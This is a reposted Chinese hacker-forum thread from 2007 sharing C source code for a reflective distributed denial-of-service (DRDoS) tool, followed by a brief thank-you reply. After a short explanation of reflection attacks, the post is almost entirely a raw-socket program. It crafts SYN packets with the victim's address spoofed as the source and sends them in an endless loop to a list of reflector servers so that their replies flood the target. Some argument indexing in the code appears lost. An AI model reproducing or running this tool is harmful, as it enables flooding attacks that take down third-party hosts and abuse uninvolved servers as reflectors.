标题: [转载] DRDoS(反射式分布拒绝服务攻击)C源代码 [打印本页]

---

作者: stylehack    时间: 2007-3-31 23:59     标题: DRDoS(反射式分布拒绝服务攻击)C源代码

这是DDoS攻击的变形,它与DDoS的不同之处就是DrDoS不需要在实际攻击之前占领大量的傀儡机.这种攻击也是在伪造数据包源地址的情况下进行的,从这一点上说与Smurf攻击一样,而DrDoS是可以在广域网上进行的.其名称中的"r"意为反射,就是这种攻击行为最大的特点.黑客同样利用特殊的发包工具,首先把伪造了源地址的SYN连接请求包发送到那些被欺骗的计算机上,根据TCP三次握手的规则,这些计算机会向源IP发出SYN+ACK或RST包来响应这个请求.同Smurf攻击一样,黑客所发送的请求包的源IP地址是被害者的地址,这样受欺骗的计算机就都会把回应发到受害者处,造成该主机忙于处理这些回应而被拒绝服务攻击.
废话不多说了,写个程序给大家参考,大家请看源码吧!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>

#define IPHDRSIZE sizeof(struct iphdr)
#define TCPHDRSIZE sizeof(struct tcphdr)
#define PSEUDOHDRSIZE sizeof(struct pseudohdr)

struct pseudohdr
{
unsigned long saddr;
unsigned long daddr;
char useless;
unsigned char protocol;
unsigned short length;
};
struct forcksum
{
struct pseudohdr pseudo;
struct tcphdr tcp;
};

unsigned short in_cksum(unsigned short * addr,int len);
int main(int argc,char * argv[]);

int main(int argc,char * argv[])
{
int val;

char fname[1000];
FILE * list;

char * packet;
struct iphdr * ip;
struct tcphdr * tcp;
struct forcksum helpcksum;

int serverfd;
struct sockaddr_in server;

char saddr[100],daddr[100];
unsigned short a,b,c,d,sport,dport,tport;

if (argc != 3)
{
printf("\nDistributed Reflection DoS tool - v1.0\n");
printf("Copyright (C) 2003 KrystalEye.com\n\n");
printf("Usage: %s <list> <target IP>\n\n",argv[0]);
printf(" -list : Path to Zombies (\"Reflection Servers\") list file\n");
printf(" -target IP: IP address of target\n\n");
printf("*** Syntax of list file ***\n");
printf(" -Each line contains 1 zombie's information\n");
printf(" -Each zombie is described by 5 numbers:\n");
printf(" 4 octets of IP address (without '.') and Port number\n");
printf(" -Numbers are seperated by at least 1 blank character (' ')\n");
printf("Example: 203 162 56 78 80\n");
printf(" => IP: 203.162.56.78 || Port: 80\n\n");
printf("Email: ngmnhat@yahoo.com\n");
printf("Good luck! Thanks for using this tool!\n\n");
exit(-1);
}
else
{
sprintf(fname,"%s",argv );
sprintf(saddr,"%s",argv );
sprintf(daddr,"%s",argv );
tport = random() % 10000;
sport = tport;
dport = tport;
}

if ((packet = (char *)malloc(IPHDRSIZE + TCPHDRSIZE)) == NULL)
{
printf("Error: malloc()\n");
exit(-1);
}

bzero(packet,sizeof(packet));
bzero(&helpcksum,sizeof(helpcksum));

ip = (struct iphdr *)packet;
tcp = (struct tcphdr *)(packet + IPHDRSIZE);

helpcksum.pseudo.saddr = inet_addr(saddr);
helpcksum.pseudo.daddr = inet_addr(daddr);
helpcksum.pseudo.useless = 0;
helpcksum.pseudo.protocol = IPPROTO_TCP;
helpcksum.pseudo.length = htons(TCPHDRSIZE);

tcp->source = htons(sport);
tcp->dest = htons(dport);
tcp->seq = htonl(random());
tcp->ack_seq = 0;
tcp->doff = 5;
tcp->fin = 0;
tcp->syn = 1;
tcp->rst = 0;
tcp->psh = 0;
tcp->ack = 0;
tcp->window = htons(65535);
tcp->urg_ptr = 0;
tcp->check = 0;
helpcksum.tcp = *tcp;
tcp->check = in_cksum((unsigned short *)&helpcksum,TCPHDRSIZE + PSEUDOHDRSIZE);

ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = IPHDRSIZE + TCPHDRSIZE;
ip->id = random();
ip->ttl = 255;
ip->protocol = IPPROTO_TCP;
ip->saddr = inet_addr(saddr);
ip->daddr = inet_addr(daddr);
ip->check = 0;
ip->check = in_cksum((unsigned short *)ip,IPHDRSIZE);

if ((serverfd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
printf("Error: socket()\n");
exit(-1);
}

setsockopt(serverfd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(int));

bzero(&server,sizeof(struct sockaddr));
server.sin_family = AF_INET;

if ((list = fopen(fname,"r")) == NULL)
{
printf("Error: cannot open file\n");
exit(-1);
}
fscanf(list,"%hu",&a);
if (feof(list))
{
printf("Error: empty list\n");
fclose(list);
exit(-1);
}
fclose(list);

printf("\nAttacking %s...\n\n",argv );
printf("Press <Ctrl-C> to Stop.\n");

while (1)
{
list = fopen(fname,"r");

while (!feof(list))
{
fscanf(list," %hu %hu %hu %hu %hu",&a,&b,&c,&d,&tport);

sprintf(daddr,"%hu.%hu.%hu.%hu",a,b,c,d);

helpcksum.pseudo.daddr = inet_addr(daddr);

ip->daddr = inet_addr(daddr);
ip->id = random();
ip->check = 0;

dport = tport;

tcp->source = htons(random() % 10000);
tcp->dest = htons(dport);
tcp->seq = htonl(random());
tcp->check = 0;
helpcksum.tcp = *tcp;

tcp->check = in_cksum((unsigned short *)&helpcksum,TCPHDRSIZE + PSEUDOHDRSIZE);
ip->check = in_cksum((unsigned short *)ip,IPHDRSIZE);

server.sin_addr.s_addr = inet_addr(daddr);
server.sin_port = htons(dport);

sendto(serverfd,packet,ip->tot_len,0,(struct sockaddr *)&server,sizeof(struct sockaddr));

usleep(100);
}

fclose(list);
}

close(serverfd);
return 0;
}

unsigned short in_cksum(unsigned short * addr,int len)
{
register int sum = 0;
u_short answer = 0;
register u_short * w = addr;
register int nleft = len;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return answer;
}

---

作者: smallevil    时间: 2007-4-8 00:17

这篇子不好呀。
谢楼主了。
[1][2][3]

---

欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)

Powered by Discuz! 7.2